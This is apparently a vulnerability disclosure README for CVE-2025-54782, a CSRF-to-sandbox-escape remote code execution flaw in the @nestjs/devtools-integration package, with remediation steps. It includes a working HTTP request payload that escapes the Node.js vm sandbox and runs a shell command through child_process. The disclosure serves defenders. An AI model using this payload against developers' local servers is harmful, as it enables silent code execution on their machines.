
CVE-2025-54782 PoC — @nestjs/devtools-integration's CSRF to Sandbox Escape Allows for RCE against JS Developers

**Associated Vulnerability**

Title: @nestjs/devtools-integration's CSRF to Sandbox Escape Allows for RCE against JS Developers (CVE-2025-54782)

Description: Nest is a framework for building scalable Node.js server-side applications. In versions 0.2.0 and below, a critical Remote Code Execution (RCE) vulnerability was discovered in the @nestjs/devtools-integration package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (safe-eval-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine. The package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, /inspector/graph/interact, accepts JSON input containing a code field and executes the provided code in a Node.js vm.runInNewContext sandbox. This is fixed in version 0.2.1.

**Description:** NestJS DevTools Unauthenticated RCE

**Readme**
# CVE-2025-54782: Critical Bug in NestJS DevTools

🚨 **Critical Security Issue** - CVSS Score: 9.4/10

## Discovery

A critical security vulnerability was discovered in NestJS DevTools that allows attackers to execute arbitrary code on developers' machines through malicious websites. This represents a significant security risk as it can lead to complete system compromise.

## The Problem

**Affected Package:** `@nestjs/devtools-integration` version 0.2.0 and below  
**What Goes Wrong:** The package creates a local development server with insufficient security controls  
**Who's At Risk:** Any developer using NestJS DevTools in their local environment  

### How The Attack Works

When you have NestJS DevTools running, it starts a local server (usually on port 3000). This server has an endpoint at `/inspector/graph/interact` that's supposed to help with debugging. But here's the problem:

1. **Missing Access Controls** - Cross-origin requests are permitted to the local development server
2. **Inadequate Sandboxing** - The JavaScript execution sandbox can be bypassed
3. **Privilege Escalation** - Successful sandbox escape grants full system access

### Real Attack Example

A malicious website could send this request to your local NestJS server:

```http
POST /inspector/graph/interact HTTP/1.1
Content-Type: text/plain

{"code":"(function(){try{propertyIsEnumerable.call()}catch(pp){pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('whoami')}})()"}
```

This payload demonstrates:
- Sandbox escape via exception handling and constructor manipulation
- Process object access through prototype chain exploitation
- Command execution via child_process module

## Security Impact

- **Remote Code Execution** - Complete system compromise potential
- **Silent Exploitation** - Attacks occur without user awareness
- **Low Attack Complexity** - Simple web interaction triggers exploitation
- **Developer Targeting** - Could facilitate supply chain attacks on development environments

## Remediation

**Immediate Action Required:** Update the package:

```bash
npm update @nestjs/devtools-integration
```

**Verify Installation:**
```bash
npm ls @nestjs/devtools-integration
```

Ensure you're running version **0.2.1 or later**.

## Timeline

- Found the vulnerability while testing NestJS DevTools
- Reported it to the NestJS team
- They fixed it in version 0.2.1
- CVE-2025-54782 was assigned
- Now sharing this publicly to help other developers stay safe

## Official References

- [Socket.dev Blog Post](https://socket.dev/blog/nestjs-rce-vuln)
- [NestJS Security Advisory](https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7)
- [Official CVE Entry](https://nvd.nist.gov/vuln/detail/CVE-2025-54782)
